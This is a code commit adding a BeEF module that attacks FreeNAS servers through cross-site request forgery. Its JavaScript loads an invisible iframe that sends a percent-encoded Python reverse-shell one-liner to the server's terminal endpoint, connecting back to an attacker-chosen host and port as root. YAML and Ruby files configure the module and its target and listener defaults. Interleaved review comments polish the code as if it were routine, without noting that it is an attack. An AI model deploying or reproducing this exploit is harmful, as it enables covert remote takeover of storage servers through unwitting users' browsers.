Added FreeNAS remote reverse root shell CSRF module
For more information see: http://support.freenas.org/ticket/1788
@@ -0,0 +1,34 @@
|
|||||||
|
//
|
||||||
|
// Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
//
|
||||||
|
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
// you may not use this file except in compliance with the License.
|
||||||
|
// You may obtain a copy of the License at
|
||||||
|
//
|
||||||
|
// http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
//
|
||||||
|
// Unless required by applicable law or agreed to in writing, software
|
||||||
|
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
// See the License for the specific language governing permissions and
|
||||||
|
// limitations under the License.
|
||||||
|
//
|
||||||
|
beef.execute(function() {
|
||||||
|
var rhost = '<%= @rhost %>';
|
||||||
|
var rport = '<%= @rport %>';
|
||||||
|
var lhost = '<%= @lhost %>';
|
||||||
|
var lport = '<%= @lport %>';
|
||||||
|
var sid = Math.floor(Math.random()*1000)+1;
|
||||||
|
|
||||||
|
var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
|
||||||
|
freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d');
|
||||||
|
|
||||||
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||||
|
|
||||||
|
cleanup = function() {
|
||||||
|
document.body.removeChild(freenas_add_user_iframe);
|
||||||
|
}
|
||||||
|
setTimeout("cleanup()", 15000);
|
||||||
|
|
||||||
|
});
|
||||||
|
|
||||||
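Review bot: `cleanup` is assigned without `var`, so it becomes a global on the page the script runs in, and `setTimeout("cleanup()", 15000)` then depends on that global through the string-eval form of setTimeout. Declaring it locally and passing the function reference, `var cleanup = function() { ... };` followed by `setTimeout(cleanup, 15000);`, avoids overwriting any page-defined `cleanup` and drops the implicit eval. The iframe variable is named `freenas_add_user_iframe` although nothing in this file adds a user; the name looks carried over from another module and should be renamed to match what the module does. The long percent-encoded `k` value has no comment describing what it decodes to, which makes the file hard to audit; a one-line description above the `setAttribute` call would help.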
@@ -0,0 +1,28 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
################################################################################
|
||||||
|
# For more information see: http://support.freenas.org/ticket/1788
|
||||||
|
################################################################################
|
||||||
|
beef:
|
||||||
|
module:
|
||||||
|
freenas_reverse_root_shell_csrf:
|
||||||
|
enable: true
|
||||||
|
category: ["Exploits", "NAS"]
|
||||||
|
name: "FreeNAS Reverse Root Shell CSRF"
|
||||||
|
description: "Attempts to get a reverse root shell on a FreeNAS server.<br/>Tested on version 8.2.0 however other versions are likely to be vulnerable."
|
||||||
|
authors: ["bcoles"]
|
||||||
|
target:
|
||||||
|
working: ["ALL"]
|
||||||
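Review bot: The `description` string gives only the tested version (8.2.0) and leaves the upstream ticket in a file comment, so someone reading the module entry in the UI cannot tell which reported issue it corresponds to. Consider appending the reference to the description, e.g. `...other versions are likely to be vulnerable.<br/>See http://support.freenas.org/ticket/1788`. `working: ["ALL"]` also asserts that every browser works; if that was not tested, a narrower list would be more accurate. The module ships with `enable: true`, so a comment stating that this default is intentional would be worth adding.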
@@ -0,0 +1,37 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
################################################################################
|
||||||
|
# For more information see: http://support.freenas.org/ticket/1788
|
||||||
|
################################################################################
|
||||||
|
class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
|
||||||
|
|
||||||
|
def self.options
|
||||||
|
configuration = BeEF::Core::Configuration.instance
|
||||||
|
lhost = "#{configuration.get("beef.http.host")}"
|
||||||
|
lhost = "" if lhost == "0.0.0.0"
|
||||||
|
return [
|
||||||
|
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
|
||||||
|
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
|
||||||
|
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
|
||||||
|
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def post_execute
|
||||||
|
save({'result' => @datastore['result']})
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
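Review bot: In `self.options`, `lhost = "#{configuration.get("beef.http.host")}"` wraps a single value in an interpolated string only to coerce it; `lhost = configuration.get("beef.http.host").to_s` says the same thing directly. The next line, which blanks the value when it is `0.0.0.0`, has no comment; something like `# 0.0.0.0 is a wildcard bind address, not a usable host value, so leave the field empty` would explain it. The four option values are returned as free-form strings with no validation in this class, and the companion script substitutes them into quoted JavaScript literals, so a check that `rport` and `lport` are numeric and that the host fields contain no quote characters would be worth adding. Where the framework expects such a check is not visible on this page. The explicit `return` and the trailing comma before `]` are harmless but not idiomatic Ruby.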